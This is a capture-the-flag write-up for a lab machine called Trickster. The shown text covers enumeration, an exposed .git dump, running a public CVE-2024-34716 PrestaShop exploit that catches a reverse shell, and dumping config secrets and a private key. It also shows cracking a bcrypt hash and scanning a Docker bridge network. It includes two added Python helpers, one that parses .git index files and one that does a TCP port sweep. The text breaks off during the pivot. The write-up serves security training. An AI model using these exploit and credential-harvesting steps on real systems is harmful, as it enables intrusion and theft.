Trickster
Synopsis
Trickster is a medium Linux machine created by EmSec. The subdomain shop.trickster.htb runs PrestaShop 8.1.5, which is vulnerable to CVE-2024-34716, an XSS in the customer contact form that can be chained into a malicious theme upload and gives a shell as www-data. The MySQL database contains james's bcrypt hash, which is crackable with rockyou. A Docker container exposes changedetection.io 0.45.20 on port 5000, which is vulnerable to CVE-2024-32651, a server-side template injection (SSTI) that allows RCE. The container's Backups directory contains a .br snapshot that holds adam's credentials. adam is allowed to run prusaslicer as root via sudo, and that binary
is vulnerable to CVE-2023-47268, arbitrary code execution through crafted 3MF project files, which gives a shell as root.
Linux
Medium
30
21-09-2024
01-02-2025
Enumeration
Nmap
A full-port nmap scan finds SSH and HTTP running.
nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.34
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 19:17 EST
Warning: 10.10.11.34 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.34
Host is up (0.55s latency).
Not shown: 64272 closed tcp ports (conn-refused), 1261 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_ 256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.07 seconds
Add the trickster.htb domain in /etc/hosts file.
Web - trickster.htb
Trickster is an online shopping platform.
Visiting the Contact and Shop pages reveals a contact form and a link to the shop.trickster.htb subdomain.
Add the shop.trickster.htb in /etc/hosts file.
Web - shop.trickster.htb
The subdomain lists products that can be bought or added to a cart.
The site is built with PrestaShop, an open-source platform for building e-commerce websites.
Directory enumeration with ffuf reveals an exposed .git directory.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://shop.trickster.htb/FUZZ -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shop.trickster.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
.git/config [Status: 200, Size: 112, Words: 11, Lines: 8, Duration: 884ms]
.git/HEAD [Status: 200, Size: 28, Words: 2, Lines: 2, Duration: 970ms]
.git/logs/ [Status: 200, Size: 1137, Words: 77, Lines: 18, Duration: 971ms]
.git/index [Status: 200, Size: 252177, Words: 733, Lines: 978, Duration: 539ms]
:: Progress: [4723/4723] :: Job [1/1] :: 52 req/sec :: Duration: [0:01:22] :: Errors: 0 ::
Using git-dumper to dump the contents of the exposed .git directory.
git-dumper http://shop.trickster.htb .git
Listing the dumped repository reveals the PrestaShop admin panel path.
admin634ewutrx1jgitlooaj Install_PrestaShop.html INSTALL.txt LICENSES Makefile
PrestaShop 8.1.5, the version running here, is vulnerable to CVE-2024-34716, an XSS via the customer contact form that PrestaShop disclosed in a security advisory in their GitHub repository. Once an administrator opens the malicious message, the XSS can be chained into a theme upload and remote code execution, which is why the admin directory name recovered from .git matters.
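As an added example (not part of the original write-up and not git-dumper's code), the following Python parses a .git/index file, which the ffuf scan showed is world readable, and lists the tracked paths. The index alone reveals the back-office directory name without fetching a single object, and verifying its trailing SHA-1 catches a truncated download. The sample index is constructed inline from a made-up PrestaShop-like file list so the script runs offline; the layout it builds and parses is git's own (version 2 entries, 62-byte fixed header, NUL padding to 8 bytes).

```python
"""List tracked paths from an exposed .git/index without dumping objects.

Added example for the write-up; the sample index is constructed, not
taken from the target.
"""
import hashlib
import struct


def build_index(paths):
    """Construct a minimal git index (version 2) for the given paths.

    Constructed sample data: stat fields and object ids are zeroed; only
    the on-disk layout matters for the parser.
    """
    body = struct.pack(">4sII", b"DIRC", 2, len(paths))
    for path in sorted(paths):                       # git stores entries sorted
        name = path.encode()
        entry = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0)
        entry += b"\x00" * 20                        # object id (dummy)
        entry += struct.pack(">H", min(len(name), 0xFFF))  # flags: low 12 bits = name length
        entry += name
        entry += b"\x00" * (8 - (len(entry) % 8))    # 1..8 NULs: terminate name, pad to 8
        body += entry
    return body + hashlib.sha1(body).digest()        # trailing checksum


def list_index_paths(data):
    """Return the tracked paths recorded in a git index (versions 2 and 3)."""
    sig, version, count = struct.unpack(">4sII", data[:12])
    if sig != b"DIRC":
        raise ValueError("not a git index")
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated download?)")
    paths, pos = [], 12
    for _ in range(count):
        start = pos
        flags = struct.unpack(">H", data[pos + 60:pos + 62])[0]
        pos += 62                                    # fixed part of the entry
        if version == 3 and flags & 0x4000:          # extended flags word present
            pos += 2
        name_len = flags & 0xFFF
        if name_len < 0xFFF:
            name = data[pos:pos + name_len]
            pos += name_len
        else:                                        # long name: read to the NUL
            end = data.index(b"\x00", pos)
            name = data[pos:end]
            pos = end
        paths.append(name.decode("utf-8", "replace"))
        pos = start + ((pos - start + 8) // 8) * 8   # skip the NUL padding
    return paths


def admin_dirs(paths):
    """PrestaShop back-office directories are top-level dirs named admin<random>."""
    tops = {p.split("/")[0] for p in paths}
    return sorted(t for t in tops if t.startswith("admin"))


# Constructed sample, modelled on a PrestaShop checkout (not the real repo).
SAMPLE_PATHS = [
    "admin634ewutrx1jgitlooaj/index.php",
    "app/config/parameters.php",
    "INSTALL.txt",
    "themes/classic/config/theme.yml",
]
SAMPLE_INDEX = build_index(SAMPLE_PATHS)

if __name__ == "__main__":
    tracked = list_index_paths(SAMPLE_INDEX)
    print("\n".join(tracked))
    print("back-office dir(s):", admin_dirs(tracked))
```

Against a live target the bytes would come from a single GET of /.git/index; the checksum check matters there because a partial response still starts with a valid header.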
Foothold
Shell - www-data [ CVE-2024-34716 Exploit ]
aelmokhtar has published an exploit script for the vulnerability on GitHub. Clone the repository.
git clone https://github.com/aelmokhtar/CVE-2024-34716
Cloning into 'CVE-2024-34716'...
remote: Enumerating objects: 60, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (42/42), done.
remote: Total 60 (delta 30), reused 34 (delta 13), pack-reused 0 (from 0)
Receiving objects: 100% (60/60), 6.71 MiB | 782.00 KiB/s, done.
Resolving deltas: 100% (30/30), done.
Change into CVE-2024-34716 and run exploit.py. As the output below shows, the script serves a malicious theme archive from a local HTTP server on port 5000, listens on port 12345 for the reverse shell, and polls for the dropped PHP file until the theme has been imported; the admin path is needed so the injected JavaScript can reach the back office's theme import.
python3 exploit.py -h
usage: exploit.py [-h] --url URL --email EMAIL --local-ip LOCAL_IP
--admin-path ADMIN_PATH
CVE-2024-34716 Exploit
options:
-h, --help show this help message and exit
--url URL The Presta Shop base url.
--email EMAIL The email address of admin user.
--local-ip LOCAL_IP Local HTTP Server IP.
--admin-path ADMIN_PATH
The Presta Shop admin path.
python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com --local-ip 10.10.16.19 --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
Url: http://shop.trickster.htb
Email: dexter@mail.com
Local IP: 10.10.16.19
Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:12345
Ncat: Listening on 0.0.0.0:12345
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [02/Feb/2025 04:25:54] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Ncat: Connection from 10.10.11.34:50560.
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
09:26:29 up 18:25, 0 users, load average: 0.02, 0.16, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Lateral Movement
Pillaging - www-data [ user ]
The PrestaShop config file parameters.php gives us the credentials for the MySQL database.
$ pwd
/var/www/prestashop/app/config
<?php return array (
'parameters' =>
array (
'database_host' => '127.0.0.1',
'database_port' => '',
'database_name' => 'prestashop',
'database_user' => 'ps_user',
'database_password' => 'prest@shop_o',
'database_prefix' => 'ps_',
'database_engine' => 'InnoDB',
'mailer_transport' => 'smtp',
'mailer_host' => '127.0.0.1',
'mailer_user' => NULL,
'mailer_password' => NULL,
'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
'ps_caching' => 'CacheMemcache',
'ps_cache_enable' => false,
'ps_creation_date' => '2024-05-25',
'locale' => 'en-US',
'use_debug_toolbar' => true,
'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw17S9nQ0PDi4OqsG6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
',
),
);
Shell - james
Upgrade the shell, then use the credentials to log in to MySQL. Note that mysql's -p takes the password with no space after it; with a space, the next word is parsed as the database name, which is why the first attempt below fails.
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@trickster:~/prestashop/app/config$ ^Z
[1] + 214361 suspended python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com
stty raw -echo; fg
[1] + 214361 continued python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com
www-data@trickster:~/prestashop/app/config$
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prest@shop_o
Enter password:
ERROR 1044 (42000): Access denied for user 'ps_user'@'localhost' to database 'prest@shop_o'
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prestashop
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 26924
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [prestashop]>
Enumerating the database gives james's bcrypt hash from ps_employee, which can be cracked and the password reused for SSH.
MariaDB [prestashop]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| prestashop |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [prestashop]> use prestashop;
Database changed
MariaDB [prestashop]> show tables;
+-------------------------------------------------+
| Tables_in_prestashop |
+-------------------------------------------------+
| ps_access |
| ps_accessory |
| ps_address |
| ps_address_format |
| ps_admin_filter |
| ps_alias |
| ps_api_access |
| ps_attachment |
| ps_attachment_lang |
| ps_attribute |
| ps_attribute_group |
| ps_attribute_group_lang |
| ps_attribute_group_shop |
| ps_attribute_lang |
| ps_attribute_shop |
| ps_authorization_role |
| ps_authorized_application |
| ps_blockwishlist_statistics |
| ps_carrier |
| ps_carrier_group |
| ps_carrier_lang |
| ps_carrier_shop |
| ps_carrier_tax_rules_group_shop |
| ps_carrier_zone |
| ps_cart |
| ps_cart_cart_rule |
| ps_cart_product |
| ps_cart_rule |
| ps_cart_rule_carrier |
| ps_cart_rule_combination |
| ps_cart_rule_country |
| ps_cart_rule_group |
| ps_cart_rule_lang |
| ps_cart_rule_product_rule |
| ps_cart_rule_product_rule_group |
| ps_cart_rule_product_rule_value |
| ps_cart_rule_shop |
| ps_category |
| ps_category_group |
| ps_category_lang |
| ps_category_product |
| ps_category_shop |
| ps_cms |
| ps_cms_category |
| ps_cms_category_lang |
| ps_cms_category_shop |
| ps_cms_lang |
| ps_cms_role |
| ps_cms_role_lang |
| ps_cms_shop |
| ps_configuration |
| ps_configuration_kpi |
| ps_configuration_kpi_lang |
| ps_configuration_lang |
| ps_connections |
| ps_connections_page |
| ps_connections_source |
| ps_contact |
| ps_contact_lang |
| ps_contact_shop |
| ps_country |
| ps_country_lang |
| ps_country_shop |
| ps_currency |
| ps_currency_lang |
| ps_currency_shop |
| ps_customer |
| ps_customer_group |
| ps_customer_message |
| ps_customer_message_sync_imap |
| ps_customer_session |
| ps_customer_thread |
| ps_customization |
| ps_customization_field |
| ps_customization_field_lang |
| ps_customized_data |
| ps_date_range |
| ps_delivery |
| ps_emailsubscription |
| ps_employee |
| ps_employee_session |
| ps_employee_shop |
| ps_feature |
| ps_feature_flag |
| ps_feature_lang |
| ps_feature_product |
| ps_feature_shop |
| ps_feature_value |
| ps_feature_value_lang |
| ps_ganalytics |
| ps_ganalytics_data |
| ps_gender |
| ps_gender_lang |
| ps_group |
| ps_group_lang |
| ps_group_reduction |
| ps_group_shop |
| ps_gsitemap_sitemap |
| ps_guest |
| ps_homeslider |
| ps_homeslider_slides |
| ps_homeslider_slides_lang |
| ps_hook |
| ps_hook_alias |
| ps_hook_module |
| ps_hook_module_exceptions |
| ps_image |
| ps_image_lang |
| ps_image_shop |
| ps_image_type |
| ps_import_match |
| ps_info |
| ps_info_lang |
| ps_info_shop |
| ps_lang |
| ps_lang_shop |
| ps_layered_category |
| ps_layered_filter |
| ps_layered_filter_block |
| ps_layered_filter_shop |
| ps_layered_indexable_attribute_group |
| ps_layered_indexable_attribute_group_lang_value |
| ps_layered_indexable_attribute_lang_value |
| ps_layered_indexable_feature |
| ps_layered_indexable_feature_lang_value |
| ps_layered_indexable_feature_value_lang_value |
| ps_layered_price_index |
| ps_layered_product_attribute |
| ps_link_block |
| ps_link_block_lang |
| ps_link_block_shop |
| ps_linksmenutop |
| ps_linksmenutop_lang |
| ps_log |
| ps_mail |
| ps_mailalert_customer_oos |
| ps_manufacturer |
| ps_manufacturer_lang |
| ps_manufacturer_shop |
| ps_memcached_servers |
| ps_message |
| ps_message_readed |
| ps_meta |
| ps_meta_lang |
| ps_module |
| ps_module_access |
| ps_module_carrier |
| ps_module_country |
| ps_module_currency |
| ps_module_group |
| ps_module_history |
| ps_module_preference |
| ps_module_shop |
| ps_operating_system |
| ps_order_carrier |
| ps_order_cart_rule |
| ps_order_detail |
| ps_order_detail_tax |
| ps_order_history |
| ps_order_invoice |
| ps_order_invoice_payment |
| ps_order_invoice_tax |
| ps_order_message |
| ps_order_message_lang |
| ps_order_payment |
| ps_order_return |
| ps_order_return_detail |
| ps_order_return_state |
| ps_order_return_state_lang |
| ps_order_slip |
| ps_order_slip_detail |
| ps_order_state |
| ps_order_state_lang |
| ps_orders |
| ps_pack |
| ps_page |
| ps_page_type |
| ps_page_viewed |
| ps_pagenotfound |
| ps_product |
| ps_product_attachment |
| ps_product_attribute |
| ps_product_attribute_combination |
| ps_product_attribute_image |
| ps_product_attribute_lang |
| ps_product_attribute_shop |
| ps_product_carrier |
| ps_product_comment |
| ps_product_comment_criterion |
| ps_product_comment_criterion_category |
| ps_product_comment_criterion_lang |
| ps_product_comment_criterion_product |
| ps_product_comment_grade |
| ps_product_comment_report |
| ps_product_comment_usefulness |
| ps_product_country_tax |
| ps_product_download |
| ps_product_group_reduction_cache |
| ps_product_lang |
| ps_product_sale |
| ps_product_shop |
| ps_product_supplier |
| ps_product_tag |
| ps_profile |
| ps_profile_lang |
| ps_psgdpr_consent |
| ps_psgdpr_consent_lang |
| ps_psgdpr_log |
| ps_psreassurance |
| ps_psreassurance_lang |
| ps_quick_access |
| ps_quick_access_lang |
| ps_range_price |
| ps_range_weight |
| ps_request_sql |
| ps_required_field |
| ps_risk |
| ps_risk_lang |
| ps_search_engine |
| ps_search_index |
| ps_search_word |
| ps_shop |
| ps_shop_group |
| ps_shop_url |
| ps_smarty_cache |
| ps_smarty_last_flush |
| ps_smarty_lazy_cache |
| ps_specific_price |
| ps_specific_price_priority |
| ps_specific_price_rule |
| ps_specific_price_rule_condition |
| ps_specific_price_rule_condition_group |
| ps_state |
| ps_statssearch |
| ps_stock |
| ps_stock_available |
| ps_stock_mvt |
| ps_stock_mvt_reason |
| ps_stock_mvt_reason_lang |
| ps_store |
| ps_store_lang |
| ps_store_shop |
| ps_supplier |
| ps_supplier_lang |
| ps_supplier_shop |
| ps_supply_order |
| ps_supply_order_detail |
| ps_supply_order_history |
| ps_supply_order_receipt_history |
| ps_supply_order_state |
| ps_supply_order_state_lang |
| ps_tab |
| ps_tab_lang |
| ps_tab_module_preference |
| ps_tag |
| ps_tag_count |
| ps_tax |
| ps_tax_lang |
| ps_tax_rule |
| ps_tax_rules_group |
| ps_tax_rules_group_shop |
| ps_timezone |
| ps_translation |
| ps_warehouse |
| ps_warehouse_carrier |
| ps_warehouse_product_location |
| ps_warehouse_shop |
| ps_web_browser |
| ps_webservice_account |
| ps_webservice_account_shop |
| ps_webservice_permission |
| ps_wishlist |
| ps_wishlist_product |
| ps_wishlist_product_cart |
| ps_zone |
| ps_zone_shop |
+-------------------------------------------------+
276 rows in set (0.001 sec)
MariaDB [prestashop]> SELECT firstname, lastname ,email, passwd FROM ps_employee;
+-----------+----------+---------------------+--------------------------------------------------------------+
| firstname | lastname | email | passwd |
+-----------+----------+---------------------+--------------------------------------------------------------+
| Trickster | Store | admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james | james | james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+-----------+----------+---------------------+--------------------------------------------------------------+
2 rows in set (0.000 sec)
MariaDB [prestashop]>
Cracked james's hash with hashcat in mode 3200 (bcrypt). Note the cost factor: the admin hash uses $2y$10$ (1024 rounds) whereas james's uses $2a$04$ (16 rounds), which is why rockyou gets through it in seconds.
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm:alwaysandforever
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6y...yunCmm
Time.Started.....: Sun Feb 2 05:45:30 2025 (4 secs)
Time.Estimated...: Sun Feb 2 05:45:34 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8821 H/s (6.76ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 37056/14344385 (0.26%)
Rejected.........: 0/37056 (0.00%)
Restore.Point....: 36992/14344385 (0.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-16
Candidate.Engine.: Device Generator
Candidates.#1....: boazona -> Yankees
Hardware.Mon.#1..: Temp: 73c Util: 95%
Started: Sun Feb 2 05:45:26 2025
Stopped: Sun Feb 2 05:45:36 2025
ssh james@10.10.11.34
The authenticity of host '10.10.11.34 (10.10.11.34)' can't be established.
ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.34' (ED25519) to the list of known hosts.
james@10.10.11.34's password:
Last login: Sun Feb 2 04:19:21 2025 from 10.10.14.7
james@trickster:~$
Pivoting
Pillaging - james [ user ]
ps aux reveals a Docker container running as root (containerd-shim) and, inside it, changedetection.py with its datastore in /datastore.
james@trickster:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 166548 11920 ? Ss Feb01 0:13 /sbin/init
----- SNIP -----
root 199684 0.0 0.3 1238144 12756 ? Sl 01:00 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id a4b9a36ae7ffc48c2b451ead77f93a8572869906f386773c3de52
root 199704 0.4 1.8 1300332 74168 ? Ssl 01:00 0:01 python ./changedetection.py -d /datastore
----- SNIP -----
runner 200150 0.1 0.0 0 0 ? Z 01:05 0:00 [chromedriver] <defunct>
james 200236 0.0 0.0 10072 1604 pts/1 R+ 01:06 0:00 ps aux
ip addr reveals the docker0 bridge and its IP address, so the container lives on 172.17.0.0/16.
james@trickster:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:73:b3 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.34/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:04:bf:9f:0d brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
209: veth484e19f@if208: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 0e:e7:8b:7f:b2:ce brd ff:ff:ff:ff:ff:ff link-netnsid 0
A ping sweep over the Docker bridge network finds two live addresses: 172.17.0.1 (the host's docker0 interface) and 172.17.0.2 (the container).
james@trickster:~$ for i in {1..254}; do (ping -c 1 172.17.0.$i | grep ttl &) ; done
64 bytes from 172.17.0.1: icmp_seq=1 ttl=64 time=0.071 ms
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.048 ms
A bash /dev/tcp connect scan of 172.17.0.2 finds only port 5000 open. This one-liner has no timeout, so it is only practical where closed ports answer with a RST immediately, as they do on the bridge network; a filtered port would stall it.
james@trickster:~$ for port in {1..65535}; do echo > /dev/tcp/172.17.0.2/$port && echo "$port open"; done 2>/dev/null
5000 open
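The /dev/tcp loop above works, but one filtered port stalls it for the kernel's full connect timeout. As an added example, not from the write-up, here is the same connect scan in Python with a per-port timeout and a thread pool, which finishes a full 65535-port sweep of the container in seconds. The localhost listener at the bottom exists only so the demo has an open port to find when run offline; on the box the target would be 172.17.0.2.

```python
"""TCP connect sweep with a timeout, for pivoting without nmap.

Added example; the self-test listener is a stand-in for the container.
"""
import socket
from concurrent.futures import ThreadPoolExecutor


def port_is_open(host, port, timeout=0.5):
    """TCP connect probe: closed ports answer RST (fast), filtered ones time out."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan_ports(host, ports, timeout=0.5, workers=200):
    """Return the sorted list of open ports among `ports`."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, port_is_open(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def _throwaway_listener():
    """Bind a listening socket on an ephemeral localhost port (demo/test only)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def demo_scan():
    """Open a listener, scan a small window around it; returns (listener_port, found)."""
    srv = _throwaway_listener()
    try:
        port = srv.getsockname()[1]
        found = scan_ports("127.0.0.1", range(port - 5, port + 6), timeout=0.3)
    finally:
        srv.close()
    return port, found


if __name__ == "__main__":
    # On the box: scan_ports("172.17.0.2", range(1, 65536))
    listener_port, found = demo_scan()
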